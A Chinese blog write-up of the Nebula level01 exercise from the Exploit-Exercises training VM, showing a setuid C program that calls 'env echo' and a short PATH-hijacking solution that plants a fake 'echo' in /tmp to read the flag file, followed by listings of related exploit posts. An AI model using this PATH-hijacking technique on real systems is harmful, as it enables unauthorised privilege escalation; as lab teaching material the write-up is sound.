i春秋 - Exploit-Exercises: Nebula - level01

最新推荐文章于 2019-01-13 22:20:22 发布

原创最新推荐文章于 2019-01-13 22:20:22 发布 · 2.6k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#exploit

exploit 专栏收录该内容

13 篇文章

订阅专栏

本文介绍了一个存在任意程序执行漏洞的程序实例。通过分析源代码并利用环境变量PATH中的echo命令覆盖技巧，展示了如何找到并利用这一漏洞。

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Nebula官网

思路

覆盖环境变量PATH中的echo命令

cd /tmp
vim echo

cat /home/flag01/flag

chmod 755 echo
PATH=/tmp:$PATH
/home/flag01/flag01

flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

jchalex

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门

04-25

Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门

精选资源

jndi-JNDI-Injection-Exploit

12-27

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器，即"open /Applications/Calculator....

参与评论您还未登录，请先登录后发表或查看评论

ExploitExercises_Nebula_Level01

小黑话不多

12-26

1442

题目源码如下： #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);

Nebula level01

无心插柳

11-08

6989

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01 . Files for t

i春秋 - Exploit-Exercises: Nebula - level02

无节操

02-25

1269

AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?Source code#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/ty

Nebula_level01

yuansunxue的专栏

01-28

417

http://www.kroosec.com/2012/10/nebula-level01.html In level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is p

wordpress-exploit-framework：一个旨在帮助WordPress系统进行渗透测试的Ruby框架

02-05

安装后，您可以通过运行wpxf启动WordPress Exploit Framework控制台。我需要运行什么？要运行WordPress Exploit Framework，需要Ruby> = 2.4.4。安装疑难解答 Debian系统如果您在安装WPXF的依赖项时遇到问题...

精选资源

linux-exploit-suggester-2:下一代Linux内核利用建议器

05-01

Linux Exploit建议器2 基于的下一代漏洞利用建议关键改进包括： ... $ ./linux-exploit-suggester.pl Local Kernel: 4.4.0 Searching among 73 exploits... Possible Exploits [1] af_packet CVE-2016-

google-translate-exploit：Google翻译翻译漏洞

02-03

5. **压缩包子文件的文件名称列表："google-translate-exploit-master"**：这可能是一个项目或代码库的主分支名，其中包含了利用Google翻译漏洞的相关代码、文档或测试用例。"master"通常表示这是源代码仓库的默认或...

精选资源

JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

05-27

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...

i春秋 - Exploit-Exercises: Nebula - level00

无节操

02-25

2578

AboutThis level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking dire

i春秋 - Exploit-Exercises: Nebula - level03

无节操

02-25

2101

AboutCheck the home directory of flag03 and take note of the files there.There is a crontab that is called every couple of minutes.思路先进flag文件夹看看cd /home/flag03 vim writable.sh#!/bin/shfor i in /home/fl

ExploitExercises_Nebula_Level07

小黑话不多

12-28

1109

题目源码为一段perl脚本： #!/usr/bin/perl use CGI qw{param}; print "Content-type: text/html\n\n"; sub ping { $host = $_[0]; print("Ping results"); @output = `ping -c 3 $host 2>&1`; foreach $line (@

Exploit-exercises

MillionSky的专栏

04-09

2204

1 概述Exploit-Exercise是一个Linux平台下漏洞挖掘、分析的练习平台。网址为：https://exploit-exercises.com官方提供了个很多虚拟机、文档、挑战题目，用于学习各种计算机安全问题，如权限提升、漏洞分析、Exploit开发、调试、逆向工程和通用的网络安全问题。目前有几个板块：Nebula、Protostar、Fusion、Main Sequence、Clo...

Exploit-Exercise之Nebula实践(二）

Yale的博客

01-13

523

获取06关卡的flag。 06 题目提示flag06的密码来自传统的unix系统这就意味这密文存储在/etc/psswd。我们直接读取过滤一下导出为cre.txt 接下来我们就需要破解该密文我们在kali中破解首先在kali上sftp连接nebula，将cre.txt下载到本机在桌面就生成了cre.txt 在终端中首先切换到桌面，然后使用john破解得到密码为hel...

i春秋 - Exploit-Exercises: Nebula（1）

大博的博客

04-29

1638

还是老哥的锅，兴冲冲的给我说这个比赛很有意思，一脸懵逼的进来，但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼，最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机，就这个我需要理解很多知识顺便补充了一个find命令（这个find命令补充还是在我的博客里）find / -user flag00 -perm -4...

i春秋 - Exploit-Exercises: Nebula - level04

无节操

02-25

1295

AboutThis level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)Source#include <stdlib.h> #include <unistd.h> #include <string.h> #incl

Exploit-Exercise之Nebula实践(四）

Yale的博客

01-13

581

获取15关卡的flag。由题目的提示可知，这题需要用到strace,使用strace观察flag15的调用情况。直接strace跟踪flag15 结果如下：可以看到（图中受限于屏幕空间没有截全），flag15大量调用libc.so.6 再使用readelf查看结果如下可以看到程序对libc.so.6存在依赖，可题目没有提供。我们需要写libc.so.6到哪个路径，让.so...